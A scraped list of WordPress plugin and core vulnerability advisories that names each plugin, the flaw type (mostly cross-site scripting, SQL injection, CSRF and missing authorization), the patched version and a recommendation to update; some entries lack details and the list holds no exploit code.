Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: BCorp Shortcodes

Plugin: TriPay Payment Gateway

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: BIC Media Widget

Plugin: Homepage SlideShow

Vulnerability: Arbitrary File Upload
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Google Fonts For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Store Exporter <= 2.7.2
Patched Version: 2.7.2.1
Recommended Action: Update to version 2.7.2.1, or a newer patched version

Plugin: Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan

Vulnerability: Missing Authorization to Arbitrary Plugin Install
Patched Version: 4.20
Recommended Action: Update to version 4.20, or a newer patched version

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Missing Authorization to Authenticated Settings Change
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Authorization Bypass to Settings Updates
Patched Version: 1.0.126
Recommended Action: Update to version 1.0.126, or a newer patched version

Plugin: WordPress plugin AnyVar

Plugin: MyBookTable Bookstore by Stormhill Media

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution

Vulnerability: Cross-Site Request Forgery via get_product
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Modern Footnotes

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.16
Recommended Action: Update to version 1.4.16, or a newer patched version

Plugin: No Future Posts

Plugin: CDI – Collect and Deliver Interface for Woocommerce

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5.1.10
Recommended Action: Update to version 5.1.10, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: WordPress ERP, HR, CRM, and Project Management Plugin – Business Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.9.5
Recommended Action: Update to version 5.9.5, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.9
Recommended Action: Update to version 1.10.9, or a newer patched version

Plugin: Cost Calculator Builder

Vulnerability: Improper Authorization
Patched Version: 3.1.43
Recommended Action: Update to version 3.1.43, or a newer patched version

Plugin: Limit Login Attempts Plus – WordPress Limit Login Attempts By Felix

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: wp-simple-login-registration-plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Cache Images

Vulnerability: Missing Authorization
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: WP-Filebase

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.24
Recommended Action: Update to version 3.4.24, or a newer patched version

Plugin: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Vulnerability: Cross-Site Request Forgery via shortpixel_ai_handle_page_action
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Weekly Schedule

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: GEO my WP

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: OneClick Chat to Order

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: MainWP UpdraftPlus Extension

Vulnerability: Missing Authorization
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Post Pay Counter

Vulnerability: Arbitrary Settings Change
Patched Version: 2.731
Recommended Action: Update to version 2.731, or a newer patched version

Plugin: External Links in New Window / New Tab

Vulnerability: Tabnabbing
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: Gallery Metabox

Vulnerability: Missing Authorization via refresh_metabox
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leyka

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.30.3
Recommended Action: Update to version 3.30.3, or a newer patched version

Plugin: Order auto complete for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Alpine Photo Tile for Instagram

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.7.6
Recommended Action: Update to version 1.2.7.6, or a newer patched version

Plugin: NewStatPress

Vulnerability: Authenticated SQL Injection
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Denial of Service via Large Form Submissions
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: Event Registration

Vulnerability: SQL Injection
Patched Version: 6.03.01
Recommended Action: Update to version 6.03.01, or a newer patched version

Plugin: Advanced AJAX Page Loader

Vulnerability: Arbitrary File Upload
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: Frontpage Manager

Vulnerability: Cross-Site Request Forgery via admin_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Prototype Pollution via Block Editor
Patched Version: 3.7.38
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.38, 3.8.38, 3.9.36, 4.0.35, 4.1.35, 4.2.32, 4.3.28, 4.4.27, 4.5.26, 4.6.23, 4.7.23, 4.8.19, 4.9.20, 5.0.16, 5.1.13, 5.2.15, 5.3.12, 5.4.10, 5.5.9, 5.6.8, 5.7.6, 5.8.4, 5.9.2

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Shortcut Macros

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection via IP
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Justified Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Portfolio and Projects

Vulnerability: Cross-Site Request Forgery via ‘wpos_anylc_admin_init_process’
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Daily Prayer Time

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2023.05.05
Recommended Action: Update to version 2023.05.05, or a newer patched version

Plugin: HT Feed

Vulnerability: Cross-Site Request Forgery leading to Limited Plugin Activation
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: RabbitLoader – Website Speed Optimization for improving Core Web Vital metrics with Cache, Image Optimization, and more

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 2.19.14
Recommended Action: Update to version 2.19.14, or a newer patched version

Plugin: WP Content Copy Protection & No Right Click

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Ajax Load More <= 5.6.0.2
Patched Version: 5.6.0.3
Recommended Action: Update to version 5.6.0.3, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.3.32
Recommended Action: Update to version 1.3.32, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Full Path Disclosure
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Cross-Site Request Forgery via delete_item
Patched Version: 2.1.0.14
Recommended Action: Update to version 2.1.0.14, or a newer patched version

Plugin: Social Hashtags

Plugin: Wholesale Market for WooCommerce

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Gift Up Gift Cards for WordPress and WooCommerce

Vulnerability: Cross-Site Request Forgery via consume_post
Patched Version: 2.22
Recommended Action: Update to version 2.22, or a newer patched version

Plugin: Cookie Notice & Compliance for GDPR / CCPA

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘cookies_policy_link’ Shortcodes
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Health Check & Troubleshooting

Vulnerability: Path Traversal
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: WP Chinese Conversion

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Short URL

Plugin: All-in-One WP Migration and Backup

Vulnerability: Missing Authorization to Database Export
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: MapGeo – Interactive Geo Maps

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: Parcel Pro

Vulnerability: Open Redirect via ‘redirect’
Patched Version: 1.6.12
Recommended Action: Update to version 1.6.12, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.2
Recommended Action: Update to version 6.8.2, or a newer patched version

Plugin: Qwizcards | online quizzes and flashcards

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.62
Recommended Action: Update to version 3.62, or a newer patched version

Plugin: Perfmatters

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Pricing Table Builder – AP Pricing Tables Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Content Filter – Censor All Offensive Content From Your Site

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: FunnelKit Checkout

Vulnerability: Authenticated(Subscriber+) Missing Authorization to Settings Change
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Webcam Video Conference

Vulnerability: Cross-Site Scripting
Patched Version: 4.51
Recommended Action: Update to version 4.51, or a newer patched version

Plugin: Portfolio Gallery – Responsive Image Gallery

Vulnerability: Missing Authorization via Multiple AJAX actions
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.5.7.7
Recommended Action: Update to version 1.5.7.7, or a newer patched version

Plugin: Event Geek

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.9.21
Recommended Action: Update to version 4.9.21, or a newer patched version

Plugin: DX Delete Attached Media

Vulnerability: Cross-Site Request Forgery via add_to_base
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Unrestricted File Upload
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting in PDF Invoicing Module
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Integration of Moneybird for WooCommerce

Plugin: Material Design for Contact Form 7

Vulnerability: Missing Authorization to Arbitrary Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FeedWordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2022.0123
Recommended Action: Update to version 2022.0123, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: Testimonial Rotator

Plugin: Page Loading Effects

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Denial of Service
Patched Version: 2.9.4.116
Recommended Action: Update to version 2.9.4.116, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Shortcodes by Angie Makes

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.07
Recommended Action: Update to version 2.07, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.3.8.3
Recommended Action: Update to version 3.3.8.3, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.19
Recommended Action: Update to version 4.19, or a newer patched version

Plugin: CodeBard's Patron Button and Widgets for Patreon

Vulnerability: Reflected Cross-Site Scripting via cb_p6_tab
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: User Activity Log Pro

Vulnerability: Tracking Bypass via IP Spoofing
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Mass Pages/Posts Creator

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Request Forgery to Question Deletion
Patched Version: 1.3.2.5
Recommended Action: Update to version 1.3.2.5, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Visual CSS Style Editor

Vulnerability: Reflected Cross-Site Scripting liveLink
Patched Version: 7.5.9
Recommended Action: Update to version 7.5.9, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: SQL Injection
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Google Forms

Vulnerability: Remote Code Execution
Patched Version: 0.94
Recommended Action: Update to version 0.94, or a newer patched version

Plugin: WP Last Modified Info

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: TWChat – Send or receive messages from users

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: WP Colorbox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Subscriber+ Blind SQL injection
Patched Version: 6.1.6
Recommended Action: Update to version 6.1.6, or a newer patched version

Plugin: Ocim MP3

Plugin: WP Post Rating

Vulnerability: Missing Authorization to Vote Manipulation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Email

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.25
Recommended Action: Update to version 1.3.25, or a newer patched version

Plugin: Download Monitor

Vulnerability: Admin+ SQL Injection via orderby parameter
Patched Version: 4.4.5
Recommended Action: Update to version 4.4.5, or a newer patched version

Plugin: Cyclone Slider

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Missing Authorization
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.73.4
Recommended Action: Update to version 2.73.4, or a newer patched version

Plugin: Anchor Episodes Index (Spotify for Podcasters)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: fgallery

Vulnerability: SQL injection
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: SQL Injection
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Testimonial

Vulnerability: SQL Injection
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.6
Recommended Action: Update to version 3.4.6, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Missing Authorization to Opt-In
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: OptionTree

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Order Delivery Date for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via ‘orddd_lite_custom_startdate’ and ‘orddd_lite_custom_enddate’
Patched Version: 3.20.1
Recommended Action: Update to version 3.20.1, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Unauthenticated SQL Injection
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: Wholesale Suite – WooCommerce Wholesale Prices, B2B, Catalog Mode, Order Form, Wholesale User Roles, Dynamic Pricing & More

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: 2.1.5.1
Recommended Action: Update to version 2.1.5.1, or a newer patched version

Plugin: Foyer – Digital Signage for WordPress

Vulnerability: Content Injection via Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPFront Notification Bar

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: google-adsense-and-hotel-booking

Vulnerability: Open Proxy
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Multiple Cross-Site Request Forgery Issues
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery to Settings update
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: Google AdSense Click-Fraud Monitoring Plugin

Plugin: WordPress Meta Robots

Plugin: Sloth Logo Customizer

Plugin: Preloader Matrix

Plugin: accesspress-anonymous-post-pro

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Media from FTP

Vulnerability: Authenticated (Author+) Improper Privilege Management
Patched Version: 11.17
Recommended Action: Update to version 11.17, or a newer patched version

Plugin: Payment Gateways Caller for WP e-Commerce

Vulnerability: Local File Inclusion
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Fulle Path Disclosure
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Open Redirect
Patched Version: 2.9.51
Recommended Action: Update to version 2.9.51, or a newer patched version

Plugin: Parallax Scroll by adamrob.co.uk

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.0.8
Recommended Action: Update to version 6.0.8, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via filter_list
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CPO Shortcodes

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘listPostsCategory’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Multi Rating

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Missing Authorization
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: FULL – Cliente

Vulnerability: Customer <= 2.2.3
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: mb.miniAudioPlayer – an HTML5 audio player for your mp3 files

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: OnionBuzz

Vulnerability: SQL Injection
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Core: WordPress

Vulnerability: Timing Side-Channel Attack
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.5
Recommended Action: Update to version 1.10.5, or a newer patched version

Plugin: Loading Page with Loading Screen

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.83
Recommended Action: Update to version 1.0.83, or a newer patched version

Plugin: dhtmlxspreadsheet

Plugin: Easy2Map

Vulnerability: Directory Traversal
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: real.Kit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: WP Pro Real Estate 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: 博客社交分享组件

Plugin: Easy Social Icons

Vulnerability: Admin+ SQL Injection
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Custom Options Plus

Vulnerability: Cross-Site Request Forgery via custom_options_plus_adm
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Open Redirect
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: Fixedly Media Gallery

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery to Form Duplication
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Passster – Password Protect Pages and Content

Vulnerability: Insecure Password Storage to Sensitive Data Exposure
Patched Version: 3.5.5.5.2
Recommended Action: Update to version 3.5.5.5.2, or a newer patched version

Plugin: Shared Files – Frontend File Upload Form & Secure File Sharing

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.61
Recommended Action: Update to version 1.6.61, or a newer patched version

Plugin: RentPress

Plugin: Spotlight

Plugin: WP Photo Album Plus

Vulnerability: Cross-Site Scripting
Patched Version: 6.1.3
Recommended Action: Update to version 6.1.3, or a newer patched version

Plugin: White Label CMS

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.29
Recommended Action: Update to version 1.3.29, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.3.8
Recommended Action: Update to version 3.3.8, or a newer patched version

Plugin: Easy Digital Downloads – Attach Accounts to Orders

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: WP Print Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 0.6.1
Recommended Action: Update to version 0.6.1, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.1.1
Recommended Action: Update to version 7.1.1, or a newer patched version

Plugin: TextMe SMS

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Directory Traversal
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Theme Editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar

Vulnerability: Authenticated(Contributor+) SQL Injection via Shortcode
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.2.2
Recommended Action: Update to version 9.2.2, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: No subtitle
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Stored Cross Site Scripting
Patched Version: 2.40.1
Recommended Action: Update to version 2.40.1, or a newer patched version

Plugin: Potent Donations for WooCommerce

Vulnerability: Cross-Site Request Forgery in hm_wcdon_admin_page
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Gallery Plugin for WordPress – Envira Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3.3
Recommended Action: Update to version 1.8.3.3, or a newer patched version

Plugin: Page-list

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

